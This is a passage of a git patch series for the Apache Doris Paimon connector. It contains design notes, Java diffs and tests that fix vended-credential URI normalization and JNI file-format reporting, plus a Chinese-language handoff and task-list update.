*/ +private Map buildVendedStorageMap(Map raw) { + if (raw == null || raw.isEmpty()) return null; + try { + Map filtered = CredentialUtils.filterCloudStorageProperties(raw); + if (filtered.isEmpty()) return null; + return StorageProperties.createAll(filtered).stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity())); + } catch (Exception e) { + LOG.warn("Failed to normalize vended credentials", e); + return null; + } +} + +@Override public Map vendStorageCredentials(Map raw) { + // Keep getBackendPropertiesFromStorageMap INSIDE a try so the fail-soft boundary is byte-preserved + // vs the pre-refactor method (which wrapped the whole tail, incl. the BE-props call). Without this + // outer try the refactor would shift that one call from fail-soft to fail-loud (latent — the + // throwing branch is HdfsProperties.getBackendConfigProperties, unreachable for cloud STS tokens — + // but we preserve exact semantics rather than rely on unreachability). [red-team S5b/gap3] + try { + Map map = buildVendedStorageMap(raw); + return map == null ? Collections.emptyMap() : CredentialUtils.getBackendPropertiesFromStorageMap(map); + } catch (Exception e) { + LOG.warn("Failed to normalize vended credentials", e); + return Collections.emptyMap(); + } +} + +@Override public String normalizeStorageUri(String rawUri, Map rawVendedCredentials) { + if (Strings.isNullOrEmpty(rawUri)) return rawUri; + Map vended = buildVendedStorageMap(rawVendedCredentials); + Map effective = (vended != null) ? vended : storagePropertiesSupplier.get(); + return LocationPath.of(rawUri, effective).toStorageLocation().toString(); // fail-loud, legacy parity +} + +@Override public String normalizeStorageUri(String rawUri) { // keep: delegates with no token + return normalizeStorageUri(rawUri, null); +} +``` + +The extraction is **behavior-preserving for `vendStorageCredentials`**: the typed-map build is the same +filter/createAll/toMap, and the outer try keeps the BE-props call fail-soft, so the fail-soft boundary is +byte-identical to the pre-refactor method (red-team S5b confirmed the only risk was moving that call out +of the try; the outer try removes it). The 1-arg `normalizeStorageUri` becomes a delegate with a `null` +token → `effective == static` → **byte-identical to current behavior** (the 4 existing fe-core tests stay green). + +### SPI (`fe-connector-spi/ConnectorContext`) +Add the overload as a `default` that ignores the token (other connectors have no vended creds), so it is +a no-op extension for every non-paimon connector: + +```java +default String normalizeStorageUri(String rawUri, Map rawVendedCredentials) { + return normalizeStorageUri(rawUri); // ignore token; falls to the existing default (returns rawUri) +} +``` + +### Connector (`PaimonScanPlanProvider`) +Thread the once-per-scan vended token to the normalize sites: +1. `normalizeUri(String rawUri, Map vendedToken)` → `context.normalizeStorageUri(rawUri, vendedToken)` (null-context → rawUri, unchanged). +2. `buildNativeRange(...)` / `buildNativeRanges(...)`: add a `Map vendedToken` parameter; pass it to both `normalizeUri` calls (data file + DV). +3. `planScanInternal`: compute `vendedToken = (context != null) ? extractVendedToken(table) : Collections.emptyMap();` **once** (next to the `cppReader` flag) and pass it into `buildNativeRanges` at the call site (`:404`). + +`extractVendedToken(table)` is empty for non-REST (FileIO gate) → the 2-arg call degrades to the static +path → **non-REST scans are byte-unchanged**. It is computed **once per `planScan` invocation** (not per +file/sub-range — `validToken()` may refresh the token), separate from the existing +`getScanNodeProperties:558` extraction (two independent extractions; this is a pre-existing property of +the two-method plugin SPI, not introduced here). URI normalization is **invariant under token refresh** +— `validateAndNormalizeUri` consumes only scheme/bucket/key, never the access-key/secret/token — so the +two extractions can never disagree on the normalized URI (red-team gap5). It is NOT wrapped in +`executeAuthenticated` (parity: legacy did not wrap the FileIO/cred path; the existing +`getScanNodeProperties:558` call is also unwrapped). The pinned `resolveScanTable` table carries the same +`RESTTokenFileIO` reference as the base (verified: `AbstractFileStoreTable.copy` preserves `fileIO`), so +the token matches legacy's `source.getPaimonTable()` (red-team S5c). + +## Implementation Plan +1. SPI: add the `normalizeStorageUri(uri, token)` default to `ConnectorContext`. +2. fe-core: add `buildVendedStorageMap` helper; refactor `vendStorageCredentials`; add 2-arg override; make 1-arg delegate. +3. Connector: thread `vendedToken` (steps 1–3 above). +4. Tests (below). +5. Build SPI → fe-core → connector; checkstyle; import-gate. + +## Risk Analysis +- **Behavior change for non-REST**: none — empty token → static-map path, identical to today. +- **Behavior change for REST native**: was a hard throw → now normalizes via vended map (the fix). Vended + *replaces* static (legacy parity); REST static is empty so no regression for any non-REST flavor. +- **Fail-loud preserved**: REST + bad/empty token → `buildVendedStorageMap` returns null → static (empty) + → `LocationPath.of` throws (legacy also fails loud here). The normalize path stays fail-loud; the + BE-creds path (`vendStorageCredentials`/`getBackendStorageProperties`) stays fail-soft — unchanged asymmetry. +- **Perf**: for REST scans the typed map is rebuilt per normalize call (per file + per DV + per sub-range) + rather than once-per-scan as legacy did. The token is tiny; the empty-token short-circuit means non-REST + pays nothing. Behavior is identical; only re-derivation frequency differs. Noted as a minor, accepted + divergence (a once-per-scan cache would need extra SPI surface or an opaque handle — disproportionate to + a BLOCKER hotfix; revisit only if profiling flags it). +- **Other connectors**: untouched (SPI default ignores the token; only paimon calls the 2-arg). + +## Test Plan + +### Unit Tests +**fe-core — `DefaultConnectorContextNormalizeUriTest`** (the actual bug & fix): +- `vendedRestCredentialsNormalizeUnderEmptyStaticMap`: context with an **empty** static supplier (the REST + case) + a vended token carrying oss creds (`oss.access_key/secret_key/endpoint`) → `normalizeStorageUri( + "oss://bkt/.../part-0.parquet", token)` returns `s3://bkt/.../part-0.parquet`. **This is the gap that hid + the bug twice.** MUTATION: ignoring the token (old static-only path) → throws → red. +- `emptyTokenUnderEmptyStaticStillFailsLoud`: same empty-static context, **empty** token → `normalizeStorageUri( + uri, emptyMap)` throws `RuntimeException` (proves the fix is the token, not a swallow; and that fail-loud + is intact when there is genuinely no cred). +- `staticMapPathUnaffectedByEmptyToken`: oss-static context + empty token → still rewrites oss→s3 (regression + guard for non-REST; the 2-arg must fold to the static path). +- Existing 4 tests (1-arg) remain unchanged (1-arg now delegates with null token). + +**connector — `PaimonScanPlanProviderTest`** (the threading): +- Extend `RecordingConnectorContext`: override **only** the 2-arg `normalizeStorageUri(uri, token)` so it + (a) sets `lastVendedToken = token`, (b) increments `normalizeCount` once, (c) does the oss→s3 rewrite; + then make the existing 1-arg override **delegate** to `normalizeStorageUri(rawUri, null)` (single source; + no recursion — the 2-arg does the rewrite directly, never calls the 1-arg). After the connector switches + to the 2-arg call, the connector dispatches straight to this 2-arg override (NOT via the SPI default → + 1-arg), so `normalizeCount`/rewrite are driven by the 2-arg override. [red-team gap2] +- `buildNativeRangeThreadsVendedTokenToBothPaths`: call `buildNativeRange(file, dv, "parquet", emptyMap, + vendedToken, 0L, 100L)` with a non-empty `vendedToken`; assert the context received that exact token map + on the data-file **and** the DV normalize call (`lastVendedToken` equals it; `normalizeCount == 2`). + MUTATION: passing an empty/null token, or dropping the token on the DV site → red. +- Update the **5** existing call sites broken by the signature change (pass `Collections.emptyMap()` as the + new token arg; assertions unaffected — empty token folds to the unchanged path): + - 3 `buildNativeRange` sites: `nativeRangeNormalizesBothDataAndDeletionVectorPaths` (`:270`), + `nativeRangeWithoutDeletionVectorNormalizesOnlyDataPath` (`:294`), `nativeRangeWithoutContextPreservesRawPath` (`:314`). + - 2 `buildNativeRanges` sites: `buildNativeRangesAttachesSameDeletionVectorToEverySubRange` (`:782`), + `buildNativeRangesKeepsFileWholeWhenTargetNonPositive` (`:810`). [red-team gap1] + +### E2E Tests +The positive `RESTTokenFileIO` token-extraction path needs a live REST stack and is **CI-gated** +(`enablePaimonTest=false`) — same as the existing `extractVendedToken` REST branch. Not run here; noted as +gated. The two unit layers (fe-core does the real normalization with a vended map; connector proves the +token is threaded to both sites) fully cover the offline-reachable surface. + +## Files touched +- `fe/fe-connector/fe-connector-spi/.../spi/ConnectorContext.java` (add default overload) +- `fe/fe-core/.../connector/DefaultConnectorContext.java` (helper + 2-arg override + 1-arg delegate) +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProvider.java` (thread token) +- `fe/fe-core/.../connector/DefaultConnectorContextNormalizeUriTest.java` (3 new cases) +- `fe/fe-connector/.../paimon/RecordingConnectorContext.java` (2-arg override capture; 1-arg delegates) +- `fe/fe-connector/.../paimon/PaimonScanPlanProviderTest.java` (1 new + 5 updated call sites) From da012e43c2ad21f1777fde3995333d056a829eaa Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 18:11:42 +0800 Subject: [PATCH 038/128] =?UTF-8?q?fix:=20FIX-JNI-FILE-FORMAT=20=E2=80=94?= =?UTF-8?q?=20JNI/count=20split=20emits=20file=5Fformat=3D"jni"=20instead?= =?UTF-8?q?=20of=20real=20format=20(P7-1,=20MAJOR)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PaimonScanPlanProvider.buildJniScanRange and buildCountRange hardcoded .fileFormat("jni") on PaimonScanRange.Builder. The real defaultFileFormat (= table.options().getOrDefault(file.format,"parquet"), computed in planScanInternal) was passed into buildJniScanRange and IGNORED, and was not passed into buildCountRange at all. PaimonScanRange .populateRangeParams then emitted fileDesc.file_format="jni". BE paimon_cpp_reader.cpp backfills paimon FILE_FORMAT/MANIFEST_FORMAT from this field (only when unset/empty, guarded !file_format.empty()) to avoid defaulting manifest.format=avro — with the invalid "jni" it injects MANIFEST_FORMAT=jni (and FILE_FORMAT=jni when unset) and the manifest read breaks. Key mechanism: the JNI formatType routing is gated by the paimon.split property (PaimonScanRange.populateRangeParams), NOT by the fileFormat string (that string drives formatType only on the native branch, where it is already real). So emitting the real orc/parquet leaves JNI routing intact and only corrects the inner fileDesc.file_format BE consumes — matching legacy PaimonScanNode.setPaimonParams, which sets setFormatType(FORMAT_JNI) AND setFileFormat(getFileFormat(...)) = the real data-file format. Solution (connector-only, no BE change): - buildJniScanRange: .fileFormat("jni") -> .fileFormat(defaultFileFormat) (the already-passed, previously-ignored parameter). Covers the non-DataSplit metadata-split call and the DataSplit JNI call. - buildCountRange: add a defaultFileFormat parameter, use it, and thread it from the call site in planScanInternal. - PaimonScanRange.Builder default: "jni" -> "" (every production caller sets the format explicitly; empty is the safe default — BE skips its format backfill on empty rather than ever injecting an invalid value). Tests: PaimonScanPlanProviderTest (+1) jniAndCountRangesCarryRealFileFormatNotJni — a real FileSystemCatalog PK table created with explicit file.format=orc (so the asserted value is the table option, distinct from the parquet fallback): force_jni_scanner=true scan -> every JNI data range carries "orc" (not "jni"); count-pushdown scan -> the collapsed count range carries "orc". Reverting either method to "jni", or dropping the threaded defaultFileFormat, turns the assertion red. Verified: connector 262/0/1skip (PaimonScanPlanProviderTest 43/0); checkstyle 0; import-gate clean. Design: plan-doc/FIX-JNI-FILE-FORMAT-design.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 16 +++- .../connector/paimon/PaimonScanRange.java | 6 +- .../paimon/PaimonScanPlanProviderTest.java | 73 ++++++++++++++ plan-doc/FIX-JNI-FILE-FORMAT-design.md | 95 +++++++++++++++++++ 4 files changed, 184 insertions(+), 6 deletions(-) create mode 100644 plan-doc/FIX-JNI-FILE-FORMAT-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 53f04357620be9..5df75e35a7a394 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -427,8 +427,8 @@ private List planScanInternal( if (countRepresentative != null) { Map partitionValues = getPartitionInfoMap( table, countRepresentative.partition(), session.getTimeZone()); - ranges.add(buildCountRange( - countRepresentative, tableLocation, partitionValues, cppReader, countSum)); + ranges.add(buildCountRange(countRepresentative, tableLocation, defaultFileFormat, + partitionValues, cppReader, countSum)); } return ranges; @@ -624,8 +624,13 @@ private PaimonScanRange buildJniScanRange(Split split, String tableLocation, String serializedSplit = encodeSplit(split, cppReader); + // FIX-JNI-FILE-FORMAT (P7-1): emit the real data-file format (orc/parquet), NOT "jni". JNI routing + // is gated by the paimon.split property (PaimonScanRange.populateRangeParams), so this string only + // feeds fileDesc.file_format, which BE's paimon_cpp_reader backfills into FILE_FORMAT/MANIFEST_FORMAT + // (an invalid "jni" breaks the manifest read). Mirrors legacy PaimonScanNode.setPaimonParams's + // fileDesc.setFileFormat(getFileFormat(...)). return new PaimonScanRange.Builder() - .fileFormat("jni") + .fileFormat(defaultFileFormat) .paimonSplit(serializedSplit) .tableLocation(tableLocation) .partitionValues(partitionValues) @@ -652,10 +657,11 @@ static boolean isCountPushdownSplit(boolean countPushdown, DataSplit dataSplit) * reading data. The serialization format honors the cpp-reader flag, like {@link #buildJniScanRange}. */ private PaimonScanRange buildCountRange(DataSplit dataSplit, String tableLocation, - Map partitionValues, boolean cppReader, long rowCount) { + String defaultFileFormat, Map partitionValues, boolean cppReader, long rowCount) { String serializedSplit = encodeSplit(dataSplit, cppReader); + // FIX-JNI-FILE-FORMAT (P7-1): real data-file format, not "jni" (see buildJniScanRange). return new PaimonScanRange.Builder() - .fileFormat("jni") + .fileFormat(defaultFileFormat) .paimonSplit(serializedSplit) .tableLocation(tableLocation) .partitionValues(partitionValues) diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java index bc7be07498b977..9277c42c77b82d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java @@ -241,7 +241,11 @@ public static class Builder { private long start; private long length = -1; private long fileSize = -1; - private String fileFormat = "jni"; + // Every production caller sets fileFormat explicitly (the real orc/parquet). Default empty (NOT + // "jni", an invalid paimon format): BE's paimon_cpp_reader skips its FILE_FORMAT/MANIFEST_FORMAT + // backfill when this is empty (guarded !file_format.empty()), so a missing set can never inject an + // invalid format (FIX-JNI-FILE-FORMAT). + private String fileFormat = ""; private Map partitionValues; private long selfSplitWeight; diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 3957ad1a5aa4f2..20ef6b1af1dab6 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -647,6 +647,79 @@ public void countPushdownCollapsesMultipleSplitsToOneRangeBearingSummedTotal( } } + @Test + public void jniAndCountRangesCarryRealFileFormatNotJni(@TempDir Path warehouse) throws Exception { + // FIX-JNI-FILE-FORMAT (P7-1): a JNI-serialized split (the default reader path AND the COUNT(*) + // collapse range) must emit the REAL data-file format in fileDesc.file_format, NOT "jni" — BE's + // paimon_cpp_reader backfills paimon FILE_FORMAT/MANIFEST_FORMAT from it (an invalid "jni" breaks + // the manifest read). JNI routing is gated by the paimon.split property, NOT this string, so the + // real format is safe to emit (legacy PaimonScanNode.setPaimonParams does the same). The table is + // created with explicit file.format=orc so the asserted value is the table option (distinct from + // the "parquet" fallback) — proving the real option is read, not a constant. + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("pt", DataTypes.INT()) + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .partitionKeys("pt") + .primaryKey("pt", "id") + .option("bucket", "1") + .option("file.format", "orc") + .build(), false); + Table table = catalog.getTable(id); + BatchWriteBuilder wb = table.newBatchWriteBuilder(); + try (BatchTableWrite write = wb.newWrite()) { + write.write(GenericRow.of(1, 1, 100L)); + write.write(GenericRow.of(1, 2, 200L)); + List messages = write.prepareCommit(); + try (BatchTableCommit commit = wb.newCommit()) { + commit.commit(messages); + } + } + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = table; + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + List noColumns = Collections.emptyList(); + + // (a) JNI data range: force_jni_scanner=true routes the native-eligible ORC split to JNI + // (buildJniScanRange). Its file_format must be the table's "orc", not "jni". + ConnectorSession forceJni = sessionWithProps( + Collections.singletonMap("force_jni_scanner", "true")); + List jniRanges = provider.planScan( + forceJni, handle, noColumns, Optional.empty(), -1, null, /*countPushdown*/ false); + Assertions.assertFalse(jniRanges.isEmpty(), "force_jni scan must emit >=1 JNI range"); + for (ConnectorScanRange r : jniRanges) { + Assertions.assertTrue(r.getProperties().containsKey("paimon.split"), + "force_jni_scanner=true must route the split to the JNI path"); + // MUTATION: buildJniScanRange .fileFormat("jni") -> not "orc" -> red. + Assertions.assertEquals("orc", ((PaimonScanRange) r).getFileFormat(), + "a JNI range must carry the real data-file format, not \"jni\""); + } + + // (b) COUNT(*) collapse range (buildCountRange): same real-format requirement; also pins that + // defaultFileFormat is threaded into buildCountRange's new parameter from the call site. + ConnectorSession plain = sessionWithProps(Collections.emptyMap()); + List countRanges = provider.planScan( + plain, handle, noColumns, Optional.empty(), -1, null, /*countPushdown*/ true); + PaimonScanRange countRange = null; + for (ConnectorScanRange r : countRanges) { + if (r.getProperties().containsKey("paimon.row_count")) { + countRange = (PaimonScanRange) r; + } + } + Assertions.assertNotNull(countRange, "count pushdown must emit a collapsed count range"); + // MUTATION: buildCountRange .fileFormat("jni"), or dropping the threaded defaultFileFormat -> red. + Assertions.assertEquals("orc", countRange.getFileFormat(), + "the COUNT(*) collapse range must carry the real data-file format, not \"jni\""); + } + } + // ---- FIX-NATIVE-SUBSPLIT (M-3) ---- private static final long MB = 1024L * 1024L; diff --git a/plan-doc/FIX-JNI-FILE-FORMAT-design.md b/plan-doc/FIX-JNI-FILE-FORMAT-design.md new file mode 100644 index 00000000000000..22debfed610a84 --- /dev/null +++ b/plan-doc/FIX-JNI-FILE-FORMAT-design.md @@ -0,0 +1,95 @@ +# FIX-JNI-FILE-FORMAT — Design + +> Source: `reviews/P5-paimon-rereview3-2026-06-12.md` (P7-1, **MAJOR**); task `task-list-P5-rereview3-fixes.md` FIX-2. +> Connector-only, no BE change. Edits `PaimonScanPlanProvider` (same file as FIX-1; sequenced after it). + +## Problem +A JNI-serialized Paimon split (the default reader path, and the COUNT(*)-pushdown collapse range) +emits `file_format="jni"` in `TPaimonFileDesc`. BE's `paimon_cpp_reader.cpp:397-411` backfills the +paimon `FILE_FORMAT` **and** `MANIFEST_FORMAT` options from this field (only when they are unset/empty, +guarded `!file_format.empty()`), to avoid paimon-cpp defaulting `manifest.format=avro`. With the value +`"jni"` (an invalid paimon format) the backfill injects `MANIFEST_FORMAT=jni` (and `FILE_FORMAT=jni` when +the option is not serialized) → the cpp reader's manifest read breaks. + +## Root Cause +`PaimonScanPlanProvider.buildJniScanRange` and `buildCountRange` hardcode `.fileFormat("jni")` on the +`PaimonScanRange.Builder`. The correct `defaultFileFormat` +(`= table.options().getOrDefault(CoreOptions.FILE_FORMAT.key(), "parquet")`, computed once in +`planScanInternal`) is **passed into `buildJniScanRange` and ignored**, and is **not even passed into +`buildCountRange`**. `PaimonScanRange.populateRangeParams:186` then emits `fileDesc.setFileFormat("jni")`. + +**Crucial mechanism (verified):** the JNI `formatType` routing is gated by **`paimon.split` presence** +(`PaimonScanRange.populateRangeParams:160` → `setFormatType(FORMAT_JNI)`), **NOT** by the `fileFormat` +string. The `fileFormat` string is used for `formatType` only on the **native** branch (`:174-178`, +where it is already the real orc/parquet). So changing the JNI/count `fileFormat` from `"jni"` to the +real format leaves JNI routing untouched and only corrects the inner `fileDesc.fileFormat` BE consumes. + +## Legacy parity +`paimon/source/PaimonScanNode.setPaimonParams`: `rangeDesc.setFormatType(FORMAT_JNI)` (routing) **and** +`fileDesc.setFileFormat(fileFormat)` (`:288`) where +`fileFormat = getFileFormat(paimonSplit.getPathString())` (`:259`) = +`FileFormatUtils.getFileFormatBySuffix(path).orElse(source.getFileFormatFromTableProperties())`. For a +JNI whole-`DataSplit`, `getPathString()` resolves to the first data file's name, and the fallback is the +table `file.format` property. For a homogeneous paimon table (one `file.format` per table) that equals +`defaultFileFormat`. So `defaultFileFormat` is the correct, legacy-faithful value (and is exactly BE's +own `FILE_FORMAT` resolution source). + +## Design +1. **`buildJniScanRange`**: `.fileFormat("jni")` → `.fileFormat(defaultFileFormat)` (the parameter it + already receives, currently ignored). Covers both the non-DataSplit metadata-split call + (`planScanInternal:357`) and the DataSplit JNI call (`:419`). +2. **`buildCountRange`**: add a `String defaultFileFormat` parameter; `.fileFormat("jni")` → + `.fileFormat(defaultFileFormat)`; thread `defaultFileFormat` from the call site (`planScanInternal:430`, + where it is in scope). +3. **`PaimonScanRange.Builder` default (`:244`)**: change `private String fileFormat = "jni"` → + `private String fileFormat = ""`. Every production caller sets `fileFormat` explicitly, so the default + is currently dead — but `"jni"` is the very invalid value this fix removes; an empty default is the + safe one (BE's `!file_format.empty()` guard then **skips** the backfill rather than ever injecting an + invalid format, and the native `formatType` branch only matches real `orc`/`parquet`). Pure safety net, + no behavioral change for any existing path. + +### Divergence note (accepted) +`defaultFileFormat` is the table's `file.format` option; legacy derives the JNI format path-suffix-first +(first data file), table-prop fallback. These differ only for a **mixed-format** table (e.g. after +`ALTER ... file.format` leaves old-format files), which paimon does not produce per-table; the table +option is the more correct per-table hint for the whole-split BE backfill. The native path keeps its +per-file suffix derivation (`buildNativeRange:450`, unchanged). + +## Implementation Plan +1. `buildJniScanRange`: `"jni"` → `defaultFileFormat`. +2. `buildCountRange`: add param + use it; update call site `:430`. +3. `PaimonScanRange.Builder.fileFormat` default `"jni"` → `""`. +4. Test (below); build connector + checkstyle + import-gate. + +## Risk Analysis +- **JNI routing**: unchanged — gated by `paimon.split` presence, not `fileFormat` (verified `:160`). +- **Native path**: untouched (already real per-file format). +- **BE**: no change; the fix makes the consumed value valid. Backfill only fires when the option is + unset/empty and now backfills a real format instead of `"jni"`. +- **Builder default `""`**: dead for all current callers; safer than `"jni"`/`"parquet"`. +- **System tables (binlog/audit_log)** go JNI; their `defaultFileFormat` = underlying table option (same + as legacy non-DataSplit fallback). Valid format emitted, not `"jni"`. + +## Test Plan +### Unit Tests +**connector — `PaimonScanPlanProviderTest`** (+1, real-table harness like the count tests): +- `jniAndCountRangesCarryRealFileFormatNotJni`: create a real PK table via `FileSystemCatalog`/`LocalFileIO` + with an explicit `.option("file.format", "orc")` (so `defaultFileFormat` is a deterministic `"orc"`, + distinct from the `"parquet"` fallback — proves the real table option is read, not a constant): + - `planScan(force_jni_scanner=true, countPushdown=false)` → every emitted range is a JNI data range + (`buildJniScanRange`); assert each `((PaimonScanRange) r).getFileFormat()` equals `"orc"` and not + `"jni"`. Also drives the call-site threading. + - `planScan(countPushdown=true)` → the collapsed count range (`paimon.row_count` present; + `buildCountRange`); assert `getFileFormat()` equals `"orc"`, not `"jni"` — pins the new `defaultFileFormat` + parameter + its threading from the call site. + - MUTATION: reverting either method to `.fileFormat("jni")`, or failing to thread `defaultFileFormat` + into `buildCountRange` → the `"orc"` assertion → red. + +### E2E Tests +None required (connector-only, no BE change). The BE backfill behavior is pre-existing; this fix only +changes the FE-emitted value from an invalid `"jni"` to the table's real format. + +## Files touched +- `fe/fe-connector/.../paimon/PaimonScanPlanProvider.java` (2 sites + 1 call site) +- `fe/fe-connector/.../paimon/PaimonScanRange.java` (Builder default) +- `fe/fe-connector/.../paimon/PaimonScanPlanProviderTest.java` (+1 test) From 25106d6c63fcca3bfe6b48a18a1dd20123ae7195 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 18:14:44 +0800 Subject: [PATCH 039/128] =?UTF-8?q?docs:=20roll=20HANDOFF=20+=20task-list?= =?UTF-8?q?=20=E2=80=94=20FIX-1=20(P9-1=20BLOCKER)=20&=20FIX-2=20(P7-1=20M?= =?UTF-8?q?AJOR)=20done,=20next=20FIX-3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - FIX-1 FIX-REST-VENDED-URI-NORMALIZE committed c376aba1264 - FIX-2 FIX-JNI-FILE-FORMAT committed 2e845e88bf9 - HANDOFF now points the next session at FIX-3 (FIX-INCR-SCAN-RESET) → FIX-4 (FE-config parity) Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 118 ++++++++++-------- plan-doc/task-list-P5-rereview3-fixes.md | 152 +++++++++++++++++++++++ 2 files changed, 221 insertions(+), 49 deletions(-) create mode 100644 plan-doc/task-list-P5-rereview3-fixes.md diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 42fbbc17025d17..0d3533cabc85d2 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,67 +5,87 @@ --- -# 🎯 下一个 session 的任务 — **第三轮 clean-room 对抗 review(全功能路径,禁注入开发先验)** +# 🎯 下一个 session 的任务 — **继续逐项实现第三轮 review 修复(FIX-3 起)** -P0/P1/P2/P3/P4 全清(见文末「迁移完成态」)。下一步**不是**改代码,而是**重新、独立地审阅整个 paimon connector 的所有功能路径**,从**设计**与**实现交付**两个维度查问题,并**逐路径对照 legacy 旧逻辑**找差异 + 找仍走旧逻辑 / 静默 fallback 到旧逻辑的地方。 +第三轮 clean-room 对抗 review 转出 4 个 user-approved fix([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md))。 +**FIX-1 与 FIX-2 已完成并独立 commit**;下一步 = 按 task-list **继续 FIX-3 → FIX-4**,每个走 `step-by-step-fix` skill +(design doc → impl → tests → **独立 commit**)。 -## ⛔ 本轮最重要的约束 — **禁止注入开发过程中的先验知识** -本轮目的就是**重新审阅**,用户明确要求**不要让历史记忆限制 review 的公正性与开放性**。因此: +## ✅ 已完成(本 session) +- **FIX-1 `FIX-REST-VENDED-URI-NORMALIZE`(P9-1 BLOCKER)— commit `c376aba1264`**。REST+native+对象存储读不再抛 + `No storage properties found for schema: oss`。SPI 加 `normalizeStorageUri(uri, token)` overload;fe-core + `DefaultConnectorContext` 抽 `buildVendedStorageMap`(与 `vendStorageCredentials` 单一来源),2-arg override + 用 vended-overlay map normalize(legacy「vended 替换 static」),1-arg delegate(行为不变);连接器 + `PaimonScanPlanProvider` 把 once-per-scan `extractVendedToken(table)` thread 到两个 native normalize 站点。 + 设计前跑了 5-skeptic + completeness-critic 对抗 workflow(DESIGN-SOUND)。 +- **FIX-2 `FIX-JNI-FILE-FORMAT`(P7-1 MAJOR)— commit `2e845e88bf9`**。JNI/count split 不再发 `file_format="jni"`。 + `buildJniScanRange`/`buildCountRange` 改发真 `defaultFileFormat`(`buildCountRange` 加形参+call-site thread); + `PaimonScanRange.Builder` 默认 `"jni"`→`""`。**关键:JNI formatType 由 `paimon.split` 属性存在性 gate,非 + fileFormat 字符串**,故安全。 -- **find-and-judge 阶段(每个路径的 reviewer 形成独立判断时):不要预读** `decisions-log.md` / `deviations-log.md` / 前两轮 review report(`reviews/P5-paimon-rereview*.md`)/ memory 里的 `catalog-spi-p5-*` result 文件 / 各 `*-design.md`。让每个 reviewer **只**从「当前 plugin connector 代码」+「legacy `datasource/paimon/*` 代码(仍在树内可 side-by-side)」独立判断。 -- **允许**提供的 = 「去哪看」的脚手架(代码包位置、构建/测试命令、import-gate 规则)——这些是**怎么做**不是**结论**。 -- **历史结论只在最终 reconciliation 阶段**(每个路径的独立 verdict 已形成**之后**)交叉核对,且**历史不得据此压制 / 推翻一个 finding**——若独立 review 与历史结论冲突,作为**新 finding 上报**让用户裁决(这正是本轮想暴露的东西:被开发先验「合理化」掉的问题)。 -- 参考既有偏好 [[clean-room-adversarial-review-pref]](多 agent 对抗 + 先 code 独立判断、后交叉核对)。 +## 📋 待修清单(详见 task-list;建议按序) +3. **FIX-3 `FIX-INCR-SCAN-RESET`**(P2-1, MAJOR)— @incr 漏了 legacy 的 `scan.snapshot-id=null`/`scan.mode=null` + 防御性 reset;对持久化 `scan.*` 选项的表会错。**design 须先定**:`ConnectorMvccSnapshot.Builder.property()` + **拒 null** → reset 须直接喂进 `table.copy(scanOptions)` 的 map(可持 key→null),或仅 incremental 路放行 null。 + site:`PaimonIncrementalScanParams.java` + `resolveScanTable`/`applySnapshot`(`table.copy(scanOptions)` 处)。连接器 only。 +4. **FIX-4 `FIX-FECONF-STORAGE-PARITY`**(cluster P8-1/2/3/4·P9-2/3,用户定 **FULL legacy parity**)— + `PaimonCatalogFactory.buildHadoopConfiguration` 从 raw props 重建 Configuration 不全。拆 4 独立 commit: + **4a OSS**(endpoint-from-region+S3A 键)、**4b S3**(path-style+conn/timeout)、**4c COS/OBS**(fs.cosn.*/fs.obs.*+alias)、 + **4d HMS**(hive.metastore.username alias)。连接器 only(禁 import fe-core,literal 复刻 legacy 键逻辑)。 -## 🧭 方法(对抗 review) -1. **每个路径独立 reviewer**(建议每路径 ≥1 个「实现 vs legacy 对照」reviewer),输出:设计缺陷 / 实现缺陷 / 行为差异(plugin vs legacy)/ 旧逻辑残留 or fallback。 -2. **对抗 verifier 逐 finding 证伪**(默认尝试推翻;refute 不掉才算确认)——避免「短路对≠全分支对」类误判(见过往教训:tracer PARITY 被逐分支证伪推翻)。 -3. **completeness critic** 抓漏掉的路径 / 未追的 aspect / 未核的 fallback。 -4. **最终 reconciliation**:独立 verdict 